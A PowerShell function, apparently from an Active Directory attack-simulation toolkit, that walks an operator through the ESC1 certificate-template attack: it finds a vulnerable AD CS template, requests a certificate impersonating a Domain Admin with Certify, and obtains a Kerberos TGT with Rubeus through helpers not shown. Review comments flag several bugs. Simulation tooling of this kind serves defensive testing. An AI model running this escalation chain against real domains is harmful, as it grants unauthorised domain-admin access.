Private/New-AuthenticationCertificatesAttack.ps1
function New-AuthenticationCertificatesAttack {
    ################################################################################
    #####                                                                      #####
    #####       Exploiting Misconfigured Certificate Templates (ESC1)          #####
    #####                                                                      #####
    ################################################################################
    # Interactive driver for the ESC1 phase of the simulation. It prompts the
    # operator (or auto-declines when $UnAttended is set), then calls the project
    # helpers in sequence: Get-VulnerableCertificateTemplate, Start-RequestingCertificate
    # and Get-KerberosTGT. Start/end markers and the run time are written with Write-Log.
    #
    # Globals read : $Script:DateFormatLog, $Script:Phase25, $Global:ASDomainAdmin,
    #                $yes, $no, $UnAttended, $SkipClearHost
    # Globals written: "LastStage" via Set-KeyValue
    # Parameters   : none (the Param block below is commented out)
    # Returns      : nothing; progress is reported via Invoke-Output / Write-Host
    #
    # Param([string] $param1, [string] $para2)
    $CurrentFunction = Get-FunctionName
    Write-Log -Message "### Start Function $CurrentFunction ###"
    $StartRunTime = (Get-Date).ToString($Script:DateFormatLog)

    #################### main code | out- host ####################
    Update-WindowTitle -NewTitle $Script:Phase25
    Set-KeyValue -key "LastStage" -NewValue $Script:Phase25

    # Outer loop: one full pass of the phase per iteration; exits when $repeat equals $no.
    Do {
        If (-not $SkipClearHost) { Clear-Host }
        Invoke-Output -T Header -M "Exploiting Misconfigured Certificate Templates (ESC1)"
        Invoke-Output -T Bullet -M "This attack abuses a misconfigured AD CS certificate template that allows `n a domain user to escalate privileges to those of a Domain Admin."
        # http://attack.mitre.org/techniques/T1649/

        # In unattended mode the phase is declined automatically; the operator is
        # only asked when running interactively.
        If ($UnAttended) {
            $answer = $No
        } else {
            $question = "Do you want to run this attack - Y or N? Default "
            $answer = Get-Answer -question $question -defaultValue $yes
        }

        If ($answer -eq $yes) {
            If (-not $SkipClearHost) { Clear-Host }
            write-log -Message "Start Attack Phase - Steal or Forge Authentication Certificates"

            # define parameter
            # NOTE(review): $pemFile and $pfxFile are assigned here but not referenced
            # anywhere else in this function.
            $altname = $Global:ASDomainAdmin
            $pemFile = ".\$altname.pem"
            $pfxFile = ".\$altname.pfx"

            If (-not $SkipClearHost) { Clear-Host }
            Invoke-Output -Type Header -Message "Step 1 - Identify Misconfigured and (!) Published Certificate Templates"
            # Helper returns an indexable result; index 0 is used as the template name,
            # index 1 as the domain computer and index 2 as the enterprise CA.
            $CATemplateInfo = Get-VulnerableCertificateTemplate #-myEntCA $EnterpriseCA
            $CAtemplate = $CATemplateInfo[0]
            $EnterpriseCA = $CATemplateInfo[2]

            # Step 2 can be repeated; the last result of the helper is kept in $PfxBase64.
            Do {
                If (-not $SkipClearHost) { Clear-Host }
                Invoke-Output -Type Header -Message "Step 2 - Request Certificate with Certify"
                $PfxBase64 = Start-RequestingCertificate -myEntCA $EnterpriseCA -CAtemplate $CAtemplate -altname $Global:ASDomainAdmin -domainComputer $CATemplateInfo[1]
                $question = "Would you like to repeat this attack phase? Please enter Y or N. Default "
                $repeat = Get-Answer -question $question -defaultValue $no
            } Until ($repeat -eq $no)

            #region Step 5 - Request a Kerberos TGT
            # NOTE(review): the region label says "Step 5" while the header printed
            # below says "Step 3"; one of the two is stale.
            Do {
                If (-not $SkipClearHost) { Clear-Host }
                Invoke-Output -Type Header -Message "Step 3 - Request a Ticket Granting Ticket (TGT) with Rubeus"
                Invoke-Output -T Bullet -M "Now we can request a TGT for the user for which we minted the new certificate."
                # NOTE(review): -pfxFile is passed $PfxBase64 (the value returned by
                # Start-RequestingCertificate), not the $pfxFile path defined above —
                # confirm Get-KerberosTGT expects that content.
                Get-KerberosTGT -pfxFile $PfxBase64 -altname $Global:ASDomainAdmin
                $question = "Would you like to repeat this attack phase? Please enter Y or N. Default "
                $repeat = Get-Answer -question $question -defaultValue $no
            } Until ($repeat -eq $no)
            #endregion Step 5 - Request a Kerberos TGT
        }
        ## else { return }

        If (-not $SkipClearHost) { Clear-Host }
        Write-Host "____________________________________________________________________`n"
        Write-Host " ??? REPEAT | Attack Phase - Steal or Forge Certificates ??? "
        Write-Host "____________________________________________________________________`n"
    # NOTE(review): when the phase is declined (interactively or via $UnAttended),
    # nothing in this pass assigns $repeat, so this condition depends on whatever
    # $repeat holds from an enclosing scope — confirm the loop terminates as intended.
    } Until ($repeat -eq $no)

    # NOTE(review): $CAtemplate is only assigned inside the accepted branch above;
    # on a declined pass this logs whatever the variable held before.
    Write-Log -Message " >> using $CAtemplate"

    ######################## main code ############################
    $runtime = Get-RunTime -StartRunTime $StartRunTime
    Write-Log -Message " Run Time: $runtime [h] ###"
    Write-Log -Message "### End Function $CurrentFunction ###"
    #
}